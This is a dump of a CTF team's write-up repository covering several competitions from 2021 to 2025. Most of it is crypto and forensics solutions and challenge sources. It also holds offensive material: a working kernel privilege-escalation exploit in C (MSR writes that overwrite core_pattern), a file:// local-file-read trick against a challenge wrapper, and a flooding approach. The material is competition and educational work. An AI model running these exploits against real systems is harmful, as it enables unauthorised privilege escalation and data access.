29 | 30 | ![](demodulate.png) 31 | 32 | We can just type the bits and submit `utflag{1011001011011001011001001001001011001}` 33 | -------------------------------------------------------------------------------- /2021-03-13-UTCTF/radio/demodulate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/radio/demodulate.png -------------------------------------------------------------------------------- /2021-03-13-UTCTF/radio/off.iq: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/radio/off.iq -------------------------------------------------------------------------------- /2021-03-13-UTCTF/sandwich/README.md: -------------------------------------------------------------------------------- 1 | # Sandwiched (forensics, 787p, 147 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | I got this super confidential document that is supposed to have secret information about the flag, but there's nothing useful in the PDF! 7 | ``` 8 | 9 | We get [a pdf](secret.pdf) 10 | 11 | ## Solution 12 | 13 | We initially loaded this into PDF Stream Dumper, but there didn't seem to be anything particularly interesting in the streams. 14 | Then we decided to check if it's really just a PDF, and `binwalk` told us there is a JPG inside. 
15 | We carve out this JPG and get: 16 | 17 | ![](flag.jpg) 18 | 19 | `utflag{file_sandwich_artist}` -------------------------------------------------------------------------------- /2021-03-13-UTCTF/sandwich/flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/sandwich/flag.jpg -------------------------------------------------------------------------------- /2021-03-13-UTCTF/sandwich/secret.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/sandwich/secret.pdf -------------------------------------------------------------------------------- /2021-03-13-UTCTF/small_p/README.md: -------------------------------------------------------------------------------- 1 | # Small p problems (crypto, 420p, 242 solved) 2 | 3 | ## Description 4 | 5 | ``` 6 | My buddies Whitfield and Martin were trying to share a secret key between themselves, and I was able to eavesdrop on their conversation. I bet I could probably figure out their shared secret with a little math... 7 | 8 | p = 69691 9 | g = 1001 10 | 11 | A = 17016 12 | B = 47643 13 | 14 | Note: submit either the shared secret or the shared secret wrapped in utflag{} 15 | ``` 16 | 17 | ## Task analysis 18 | 19 | It seems we just have parameters of DH exchange with very small values. 20 | 21 | ## Solution 22 | 23 | Similarly to first part of `Farmers only` we can simply calculate discrete logarithm, eg. with BS-GS, and then calculate shared secret. 

```python
import math


def baby_steps_giant_steps(a, b, p, N=None):
    """Solve a^x = b (mod p) for x, with p prime."""
    if not N:
        N = 1 + int(math.sqrt(p))
    # Baby steps: table of a^r mod p -> r for r in [0, N].
    baby_steps = {}
    baby_step = 1
    for r in range(0, N + 1):
        baby_steps[baby_step] = r
        baby_step = baby_step * a % p
    # Giant stride is a^(-N) mod p, computed with Fermat's little theorem.
    giant_stride = pow(a, (p - 2) * N, p)
    giant_step = b
    for q in range(0, N + 1):
        if giant_step in baby_steps:
            result = q * N + baby_steps[giant_step]
            return result
        else:
            giant_step = giant_step * giant_stride % p
    return None  # b is not a power of a modulo p


def main():
    p = 69691
    g = 1001
    A = 17016
    B = 47643
    a = baby_steps_giant_steps(g, A, p)
    b = baby_steps_giant_steps(g, B, p)
    # Shared secret is g^(a*b) mod p.
    print(pow(g, a * b, p))


if __name__ == "__main__":
    main()
```

And we get `53919`
--------------------------------------------------------------------------------
/2021-03-13-UTCTF/smol_data/anomaly_detect.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-13-UTCTF/smol_data/anomaly_detect.zip
--------------------------------------------------------------------------------
/2021-03-13-UTCTF/various/README.md:
--------------------------------------------------------------------------------
# Various Vernacular (beginner/crypto, 340p, 258 solved)

## Description

```
This flag was intercepted. wmysau{foeim_Tfusoli}

Unfortunately, it seems to be encrypted. Additional encrypted text was also found.
Hkgxologflutleiaymt xgf Azutgkrftmtf ltmntf ERW wfr ELW wfmtk Rkweq.
```


## Task analysis

It's pretty clear we're dealing with some substitution cipher with only a-zA-Z charset.
It's not monoalphabetic, so most likely Vigenere.


## Solution

We could try some cryptanalysis on the second, longer text, but there is a simpler way.
22 | We can strip flag format and put this into https://quipqiup.com/ setting clue `wmysau=utflag` and this gives us: 23 | 24 | `utflag nicht English` 25 | 26 | We can similarly drop the text to get: 27 | 28 | `Provisionsgeschafte von Amgeordneten setzen CDU und CSU unter Druck.` 29 | -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/README.md: -------------------------------------------------------------------------------- 1 | # VolgaCTF Quals 2021 2 | 3 | Team: BitK, SakiiR, XeR, mastho, ,Shalom 4 | 5 | ### Table of contents 6 | 7 | * [Knock-knock(crypto)](knock) 8 | * [Streams(stegastics)](streams) 9 | * [Inception(stegastics)](inception) 10 | -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/inception/1st_level.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/inception/1st_level.png -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/inception/egypt.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/inception/egypt.pdf -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/inception/lsb.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/inception/lsb.zip -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/knock/knockd.pcap: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/knock/knockd.pcap -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/streams/stream.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/streams/stream.pcap -------------------------------------------------------------------------------- /2021-03-27-VolgaCTFQuals/streams/stream2.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-03-27-VolgaCTFQuals/streams/stream2.pcap -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/README.md: -------------------------------------------------------------------------------- 1 | # ASIS Quals 2021 2 | 3 | Team: BitK, XeR, SakiiR, Posix, Shalom 4 | 5 | ### Table of contents 6 | 7 | * [Crypto warmup(crypto)](crypto_warmup) 8 | * [Madras(crypto)](madras) 9 | * [Spiritual(crypto)](spiritual) 10 | * [Pinhole(crypto)](pinhole) 11 | * [Factory(for)](factory) 12 | -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/crypto_warmup/Warmup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from Crypto.Util.number import * 4 | import string 5 | from secret import is_valid, flag 6 | 7 | def random_str(l): 8 | rstr = '' 9 | for _ in range(l): 10 | rstr += string.printable[:94][getRandomRange(0, 93)] 11 | return rstr 12 | 13 | def encrypt(msg, nbit): 14 | l, p = len(msg), getPrime(nbit) 15 | rstr = random_str(p - l) 16 | msg += rstr 17 | while True: 18 | s = getRandomNBitInteger(1024) 19 | if is_valid(s, p): 20 | break 21 | enc = msg[0] 
22 | for i in range(p-1): 23 | enc += msg[pow(s, i, p)] 24 | return enc 25 | 26 | nbit = 15 27 | enc = encrypt(flag, nbit) 28 | print(f'enc = {enc}') -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/factory/factory.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2021-10-23-ASIS-quals/factory/factory.pdf -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/madras/Madras.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from Crypto.Util.number import * 4 | from flag import FLAG 5 | 6 | def gentuple(nbit): 7 | a, b, c = [getPrime(nbit // 3) for _ in '012'] 8 | return a, b, c 9 | 10 | def encrypt(msg, params): 11 | a, b, c = params 12 | e, n = 65537, a * b * c 13 | m = bytes_to_long(msg) 14 | assert m < n 15 | enc = pow(m, e, n) 16 | return enc 17 | 18 | nbit = 513 19 | a, b, c = gentuple(nbit) 20 | enc = encrypt(FLAG, (a, b, c)) 21 | 22 | print(f'a*b + c = {a*b + c}') 23 | print(f'b*c + a = {b*c + a}') 24 | print(f'c*a + b = {c*a + b}') 25 | print(f'enc % a = {enc % a}') 26 | print(f'enc % b = {enc % b}') 27 | print(f'enc % c = {enc % c}') 28 | print(f'enc = {enc}') -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/madras/output.txt: -------------------------------------------------------------------------------- 1 | a*b + c = 4553352994596121904719118095314305574744898996748617662645730434291671964711800262656927311612741715902 2 | b*c + a = 4414187148384348278031172865715942397786003125047353436418952679980677617016484927045195450392723110402 3 | c*a + b = 2621331497797998680087841425011881226283342008022511638116013676175393387095787512291008541271355772802 4 | enc % a = 
1235691098253903868470929520042453631250042769029968 5 | enc % b = 2235727505835415157472856687960365216626058343546572 6 | enc % c = 1197976933648163722609601772402895844093866589777721 7 | enc = 6238548897897912462708514382106387305984378113132192980353695746912882399991285268937548949835500837749446265632471076030233510866260067177632747513323223 8 | -------------------------------------------------------------------------------- /2021-10-23-ASIS-quals/pinhole/pinhole.sage: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sage 2 | 3 | from sage.all import * 4 | from Crypto.Util.number import * 5 | from secret import a, flag 6 | 7 | def random_poly(degree): 8 | R. = ZZ[] 9 | f = x**degree 10 | for i in range(1, degree): 11 | f += randint(-3, 3) * x ** (degree - i) 12 | return f 13 | 14 | def genkey(a): 15 | M, N = [SL2Z.random_element() for _ in '01'] 16 | 17 | A = N * matrix(ZZ, [[0, -1], [1, 1]]) * N**(-1) 18 | B = N * matrix(ZZ, [[0, -1], [1, 0]]) * N**(-1) 19 | r, s = [randint(5, 14) for _ in '01'] 20 | U, V = (B * A) ** r, (B * A**2) ** s 21 | 22 | F = [] 23 | for _ in range(2): 24 | Ux = [random_poly(randint(1, 4)) for _ in range(4)] 25 | Ux = [Ux[i] - Ux[i](a) + U[i // 2][i % 2] for i in range(4)] 26 | Ux = matrix([[Ux[0], Ux[1]], [Ux[2], Ux[3]]]) 27 | F.append(Ux) 28 | 29 | X, Y = M * F[0] * M ** (-1), M * F[1] * M ** (-1) 30 | pubkey, privkey = (X, Y), (M, a) 31 | return pubkey, privkey 32 | 33 | def encrypt(msg, pubkey): 34 | X, Y = pubkey 35 | C = Y 36 | for b in msg: 37 | C *= X ** (int(b) + 1) * Y 38 | return C 39 | 40 | pubkey, privkey = genkey(a) 41 | msg = bin(bytes_to_long(flag.lstrip(b'ASIS{').rstrip(b'}')))[2:] 42 | enc = encrypt(msg, pubkey) 43 | 44 | print(f'pubkey = {pubkey}') 45 | print(f'enc = {enc}') -------------------------------------------------------------------------------- /2023-01-13-idekctf/README.md: 
-------------------------------------------------------------------------------- 1 | # idekCTF 2022 2 | 3 | Team: mastho, Shalom, XeR 4 | 5 | ### Table of contents 6 | * [Typop (pwn)](typop) 7 | * [Sprinter (pwn)](sprinter) 8 | * [Relativity (pwn)](relativity) 9 | * [Weep (pwn)](weep) 10 | * [Sofire=good (pwn)](sofire) 11 | * [Coroutine (pwn)](coroutine) 12 | * [MinkyMomo (pwn)](minkymomo) 13 | * [Cleithrophobia (crypto)](cleithrophobia) 14 | -------------------------------------------------------------------------------- /2023-01-13-idekctf/sofire/README.md: -------------------------------------------------------------------------------- 1 | # Sofire=good - idekCTF 2022 (pwn, 7 solved, 497p) 2 | 3 | ## Introduction 4 | Sofire=good is a pwn task. 5 | 6 | An archive containing a kernel, a ram disk, source code and boilerplate code is 7 | provided. 8 | 9 | ## Reverse engineering 10 | The challenge first asks the user for a URL to fetch and download an exploit. 11 | 12 | ```python 13 | # Downloading the user's exploit executable. 14 | try: 15 | with urllib.request.urlopen(url) as f: 16 | exploit = f.read() 17 | except Exception: 18 | print("Some error occurred while downloading your exploit executable. Try again or contact support :(\n") 19 | exit(-1) 20 | else: 21 | # Saving the user's exploit executable to a tmp disk file. 22 | with open(path, "wb") as f: 23 | f.write(exploit) 24 | ``` 25 | 26 | Then, the virtual machine is started with the exploit in `/mnt`. 27 | 28 | Very little time was spent trying to actually understand the challenge. 29 | 30 | ## Vulnerability 31 | There is an unintended vulnerability in the wrapper script. By specifying a URL 32 | starting with `file://`, it is possible to fetch local files in the virtual 33 | machine. 34 | 35 | ## Exploitation 36 | The exploitation of this unintended vulnerability is trivial. The 37 | `/home/user/initramfs.cpio` file contains the flag. 
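
The wrapper's download step shown above, as an added example that is not the challenge's own code: the same `urlopen` call beside a version that only speaks HTTP(S). The function names, the size limit and the temporary file standing in for a sensitive local file are assumptions made for this illustration.

```python
"""urlopen() scheme handling: permissive call vs. HTTP(S)-only fetch (added example)."""
import os
import pathlib
import tempfile
import urllib.request
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
MAX_BYTES = 16 * 1024 * 1024  # assumed upper bound for an uploaded executable


def fetch_vulnerable(url):
    # Same call shape as the wrapper. urlopen() dispatches on the URL scheme
    # and its default opener includes FileHandler, so file:// reads local files.
    with urllib.request.urlopen(url) as f:
        return f.read()


def validate_url(url):
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parts.scheme!r} is not allowed")
    if not parts.hostname:
        raise ValueError("URL has no host")
    return parts.geturl()


def build_http_only_opener():
    # Start from an empty OpenerDirector: build_opener() would register
    # FileHandler, FTPHandler and DataHandler again.
    opener = urllib.request.OpenerDirector()
    for handler in (
        urllib.request.UnknownHandler(),
        urllib.request.HTTPHandler(),
        urllib.request.HTTPSHandler(),
        urllib.request.HTTPDefaultErrorHandler(),
        urllib.request.HTTPRedirectHandler(),
        urllib.request.HTTPErrorProcessor(),
    ):
        opener.add_handler(handler)
    return opener


def fetch_hardened(url, max_bytes=MAX_BYTES):
    # Reject the scheme up front, then fetch with an opener that has no
    # handler for anything but HTTP(S), so a redirect cannot change protocol.
    checked = validate_url(url)
    with build_http_only_opener().open(checked, timeout=10) as f:
        data = f.read(max_bytes + 1)
    if len(data) > max_bytes:
        raise ValueError("download exceeds size limit")
    return data


def demo():
    # Constructed stand-in for a sensitive file on the wrapper's host.
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"constructed-secret")
    url = pathlib.Path(tmp.name).as_uri()  # file:///...
    try:
        leaked = fetch_vulnerable(url)
        try:
            fetch_hardened(url)
            verdict = "fetched"
        except ValueError as exc:
            verdict = str(exc)
    finally:
        os.unlink(tmp.name)
    return leaked, verdict


if __name__ == "__main__":
    print(demo())
```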
38 | 39 | ``` 40 | % ncat --ssl sofirium-97f5551e54f58151.instancer.idek.team 1337 41 | Give me the URL to your exploit executable (press enter to skip): file:///home/user/initramfs.cpio 42 | 43 | [...] 44 | 45 | / $ cd /tmp/mount 46 | cd /tmp/mount 47 | 48 | /tmp/mount $ ls 49 | ls 50 | 17d3c4bf-58a9-440e-84e7-59608c5e8380 51 | 52 | /tmp/mount $ cpio -i flag.txt < 17d3c4bf-58a9-440e-84e7-59608c5e8380 53 | cpio -i flag.txt < 17d3c4bf-58a9-440e-84e7-59608c5e8380 54 | 5788 blocks 55 | 56 | /tmp/mount $ cat flag.txt 57 | cat flag.txt 58 | idek{n0N_r3fuNd48lE_tr@s#_0n_7h3_k3rn3l_(h41n} 59 | ``` 60 | 61 | **Flag**: `idek{n0N_r3fuNd48lE_tr@s#_0n_7h3_k3rn3l_(h41n}` 62 | -------------------------------------------------------------------------------- /2023-06-21-p4ctf-finals/README.md: -------------------------------------------------------------------------------- 1 | # p4ctf 2023 finals 2 | 3 | Team: XeR, mrexodia, Shalom 4 | 5 | ### Table of contents 6 | * [rsa kebab (crypto)](rsa_kebab) 7 | * [pallas (crypto)](pallas) 8 | * [aes observed (crypto)](aes_observed) 9 | * [narco chat (misc)](narco_chat) 10 | * [ancient kingdom (web)](ancient) 11 | * [pepega packets (misc)](pepega) 12 | * [scoundrelike (re)](scoundrelike) 13 | -------------------------------------------------------------------------------- /2023-06-21-p4ctf-finals/narco_chat/client.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2023-06-21-p4ctf-finals/narco_chat/client.pyc -------------------------------------------------------------------------------- /2023-06-21-p4ctf-finals/pepega/README.md: -------------------------------------------------------------------------------- 1 | # Pepega packets (misc, 5 solves, 395p) 2 | 3 | ## Introduction 4 | 5 | We get golang source code of some [server](server.go) to work with, and network access to where this is running. 

## Task analysis

The code is pretty straightforward:

1. There is a loop which goes over all packets and "bans" the sender for a minute.
2. There is a `/flag` endpoint which will return a flag if we can stay "not banned" for 5 seconds.

So the goal is to somehow not get banned for long enough to retrieve the flag.

## Solution

The "unintended", although very popular, way to solve this was to simply flood the server.
The idea was that flooding the server with lots of packets will either:

1. Make the banning loop backlog long enough to not reach our flag request before 5 seconds expire
2. Overflow the packets buffer so that `GetPacketStream` will skip some packets between the executions of `workerFirewall`

Regardless of what exactly happened, this was enough to retrieve the flag: `p4{wow-you-are-very-fast-pepega!}`
--------------------------------------------------------------------------------
/2023-06-21-p4ctf-finals/scoundrelike/scoundrelike:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2023-06-21-p4ctf-finals/scoundrelike/scoundrelike
--------------------------------------------------------------------------------
/2023-11-04-lakeCTF-quals/README.md:
--------------------------------------------------------------------------------
# LakeCTF Quals 2023

Team: XeR, Sebbb, Shalom

### Table of contents

* [vimjail 1&2 (misc)](vimjail)
* [Vigenere-CBC (crypto)](vigenere_cbc)
* [KeySharer (crypto)](ecc_key_sharer)
* [RandomRSA (crypto)](random_rsa)
* [dive in the lake (re)](dive)
* [FUNTRAN (re)](funtran)
--------------------------------------------------------------------------------
/2023-11-04-lakeCTF-quals/dive/dive:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2023-11-04-lakeCTF-quals/dive/dive -------------------------------------------------------------------------------- /2023-11-04-lakeCTF-quals/funtran/arrayops.f90: -------------------------------------------------------------------------------- 1 | module arrayops 2 | use types, only: dp 3 | implicit none 4 | private 5 | 6 | public :: arange, linspace, diff, midpoints, full, zeros, ones 7 | 8 | contains 9 | 10 | pure function diff(x) result(r) 11 | real(dp), intent(in) :: x(:) 12 | real(dp) :: r(size(x)-1) 13 | integer :: i 14 | 15 | do i = 1, size(x)-1 16 | r(i) = x(i+1) - x(i) 17 | end do 18 | end function diff 19 | 20 | pure function midpoints(x) result(r) 21 | real(dp), intent(in) :: x(:) 22 | real(dp) :: r(size(x)-1) 23 | integer :: n 24 | n = size(x) 25 | r = (x(2:n) + x(1:n-1)) / 2.0_dp 26 | end function midpoints 27 | 28 | pure function arange(n) result(r) 29 | integer, intent(in) :: n 30 | real(dp) :: r(n) 31 | integer :: i 32 | r = [(real(i-1, dp), i=1,n)] 33 | end function arange 34 | 35 | pure function linspace(x_min, x_max, n) result(r) 36 | real(dp), intent(in) :: x_min, x_max 37 | integer, intent(in) :: n 38 | real(dp) :: r(n) 39 | 40 | r = x_min + (x_max-x_min)/(real(n, dp)-1.0_dp)*arange(n) 41 | end function linspace 42 | 43 | pure function full(n, s) result(r) 44 | integer, intent(in) :: n 45 | real(dp), intent(in) :: s 46 | real(dp) :: r(n) 47 | integer :: i 48 | 49 | r = [(s, i=1, n)] 50 | end function full 51 | 52 | pure function zeros(n) result(r) 53 | integer, intent(in) :: n 54 | real(dp) :: r(n) 55 | r = full(n, 0.0_dp) 56 | end function zeros 57 | 58 | pure function ones(n) result(r) 59 | integer, intent(in) :: n 60 | real(dp) :: r(n) 61 | r = full(n, 1.0_dp) 62 | end function ones 63 | end module arrayops -------------------------------------------------------------------------------- /2023-11-04-lakeCTF-quals/funtran/funtran: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2023-11-04-lakeCTF-quals/funtran/funtran

--------------------------------------------------------------------------------
/2023-11-04-lakeCTF-quals/random_rsa/randomrsa.py:
--------------------------------------------------------------------------------
#!/usr/bin/env -S python3 -u
import os
from Crypto.Util.number import isPrime, bytes_to_long
import random

def getPrime(n_bits, verbose=False):
    while True:
        a = random.getrandbits(n_bits)
        if isPrime(a):
            return a
        elif verbose:
            print(f"Sadly, {a} was not prime")

p = getPrime(1024, verbose=True)
q = getPrime(1024)

flag = os.getenv("flag","EPFL{fake_flag}").encode()
n = p * q
e = 65537
print(f"Ciphertext: {pow(bytes_to_long(flag), e, n)}")

--------------------------------------------------------------------------------
/2024-01-06-IrisCTF/README.md:
--------------------------------------------------------------------------------
# IrisCTF 2024

Team: BitK, erdnaxe, mastho, p4zuu, Sebbb, W00dy, XeR

### Table of contents
* [Baby Charge (crypto)](babycharge)
* [Accessible Sesamum Indicum (crypto)](asi)
* [dhash (crypto)](dhash)
* [Integral Communication (crypto)](integralcommunication)
* [Memory (pwn)](memory)
* [Serious Banking (pwn)](seriousbanking)

--------------------------------------------------------------------------------
/2024-01-06-IrisCTF/asi/README.md:
--------------------------------------------------------------------------------
# Accessible Sesamum Indicum - IrisCTF 2024 (crypto, 133 solved, 50p)

## Introduction
Accessible Sesamum Indicum is a cryptography task.

A Python script simulating vaults with 4-digit PIN codes is given.
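
The vault keypad in this write-up (4-digit PINs over 16 hexadecimal keys, 65536 key presses allowed) is the textbook case for a de Bruijn sequence. The following is an added example, not part of the original write-up: it builds B(16, 4) and counts which PINs a key stream covers, assuming the vault compares the last four keys after every press.

```python
from itertools import product

def de_bruijn(alphabet: str, n: int) -> str:
    """Cyclic de Bruijn sequence B(k, n), built by the standard Lyndon-word method."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)

def covered_pins(keys: str, n: int) -> set:
    """PINs tested by a keypad that checks the last n keys after each press (assumption)."""
    return {keys[i:i + n] for i in range(len(keys) - n + 1)}

def summary(alphabet: str = "0123456789abcdef", n: int = 4, limit: int = 65536) -> dict:
    all_pins = {"".join(p) for p in product(alphabet, repeat=n)}
    cyclic = de_bruijn(alphabet, n)
    linear = cyclic + cyclic[:n - 1]  # unrolled: also types the wrap-around windows
    return {
        "naive_keys": n * len(all_pins),          # typing every PIN separately
        "cyclic_len": len(cyclic),
        "missed_without_wrap": len(all_pins - covered_pins(cyclic, n)),
        "linear_len": len(linear),
        "missed_with_wrap": len(all_pins - covered_pins(linear, n)),
        "fits_limit": len(cyclic) <= limit,
    }

if __name__ == "__main__":
    for key, value in summary().items():
        print(f"{key}: {value}")
```

The saving exists only because of the assumed sliding-window check; a keypad that clears its buffer after every failed 4-key attempt forces the full 4 × 16⁴ presses.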

## Analysis
The script simulates a vault with a hexadecimal keypad. Trying every PIN
(0000, 0001, 0002, etc.) will require pressing 4 × 16⁴ keys. This is 4 times
above the limit of 65536 keys.

Opening multiple connections to the remote server until the randomly-selected
PIN is in the lower quarter will not work, because there are 16 vaults to solve.
The probability of succeeding 16 times in a row is (1/4)¹⁶ ≃ 2e-10.

## Exploitation
This problem can be solved with a [de Bruijn sequence](https://en.wikipedia.org/wiki/De_bruijn_sequence).

**Flag**: `irisctf{de_bru1jn_s3quenc3s_c4n_mass1vely_sp33d_up_bru7e_t1me_f0r_p1ns}`

## Appendices
### solve.py
```python
import pwn

# B(16, 4): every 4-digit hexadecimal PIN appears once in the cyclic sequence.
# de_bruijn() returns a generator, so join it into a string before printing.
db = "".join(pwn.de_bruijn("0123456789abcdef", 4))
for i in range(16):
    print(db)
```

--------------------------------------------------------------------------------
/2024-01-27-RealWorldCTF/README.md:
--------------------------------------------------------------------------------
# Real World CTF 6th

Team: BitK, erdnaxe, p4zuu, Rastislonge, SakiiR, Sebbb, SIben, Vozec, W00dy, XeR

### Table of contents
* [The truth of Plain (crypto)](truthplain)
* [Let's party in the house (pwn)](partyhouse)
* [minioday (web)](minioday)

--------------------------------------------------------------------------------
/2024-03-15-KalmarCTF/msrable/exploit/Makefile:
--------------------------------------------------------------------------------
CC = x86_64-linux-musl-gcc

pwn:
	as -o pwn.o pwn.S
	$(CC) solve.c -o solve -static pwn.o -z noexecstack

clean:
	rm pwn.o solve

--------------------------------------------------------------------------------
/2024-03-15-KalmarCTF/msrable/exploit/solve.c:
--------------------------------------------------------------------------------
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

extern uint64_t pwn(int fd, uint64_t kernel_base, size_t index, char new_char);

#define MSR_LSTAR 0xc0000082
#define MSR_FMASK 0xc0000084
#define MSR_LSTAR_OFFSET 0x800040

static uint64_t kernel_base = 0;

void rdmsr(int fd, uint64_t *ptr, uint64_t len, uint32_t reg) {
	syscall(SYS_pread64, fd, ptr, len, reg);
}

void wrmsr(int fd, uint64_t *ptr, uint64_t len, uint32_t reg) {
	syscall(SYS_pwrite64, fd, ptr, len, reg);
}

int main(void)
{
	int fd;

	fd = open("/dev/cpu/0/msr", O_RDWR);
	assert(fd > 0);

	uint64_t msr_lstar = 0;
	rdmsr(fd, &msr_lstar, sizeof(msr_lstar), MSR_LSTAR);

	printf("[+] MSR_LSTAR: %lx\n", msr_lstar);

	kernel_base = msr_lstar - MSR_LSTAR_OFFSET;
	printf("[+] Kernel base: %lx\n", kernel_base);

	uint64_t eflags = 0;
	rdmsr(fd, &eflags, sizeof(eflags), MSR_FMASK);
	eflags &= ~(1ULL << 18);
	wrmsr(fd, &eflags, sizeof(eflags), MSR_FMASK);

	char *new_core_pattern = "|/bin/chmod 777 /flag";
	for (size_t i = 0; i < strlen(new_core_pattern); i++)
		pwn(fd, kernel_base, i, new_core_pattern[i]);

	printf("[+] core_pattern overwritten\n");

	puts("[+] Triggering payload...");
	uint8_t trigger = *(uint8_t *)(0xdeadbeef);

	return 0;
}

--------------------------------------------------------------------------------
/2024-06-30-UIUCTF/README.md:
--------------------------------------------------------------------------------
# UIUCTF 2024

### Table of contents
* [Picoify](picoify)

--------------------------------------------------------------------------------
/2024-06-30-UIUCTF/picoify/meme75.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2024-06-30-UIUCTF/picoify/meme75.jpg

--------------------------------------------------------------------------------
/2024-06-30-UIUCTF/picoify/memescore.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2024-06-30-UIUCTF/picoify/memescore.jpg

--------------------------------------------------------------------------------
/2024-06-30-UIUCTF/picoify/pic16.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2024-06-30-UIUCTF/picoify/pic16.jpg

--------------------------------------------------------------------------------
/2025-01-05-IrisCTF/README.md:
--------------------------------------------------------------------------------
# IrisCTF 2025

### Table of contents
* [Spicy Messaging Sinusoids (radio)](spicy_messaging_sinusoids)

--------------------------------------------------------------------------------
/2025-01-05-IrisCTF/spicy_messaging_sinusoids/inspectrum.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2025-01-05-IrisCTF/spicy_messaging_sinusoids/inspectrum.png

--------------------------------------------------------------------------------
/2025-01-05-IrisCTF/spicy_messaging_sinusoids/urh1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2025-01-05-IrisCTF/spicy_messaging_sinusoids/urh1.png

--------------------------------------------------------------------------------
/2025-01-05-IrisCTF/spicy_messaging_sinusoids/urh2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2025-01-05-IrisCTF/spicy_messaging_sinusoids/urh2.png

--------------------------------------------------------------------------------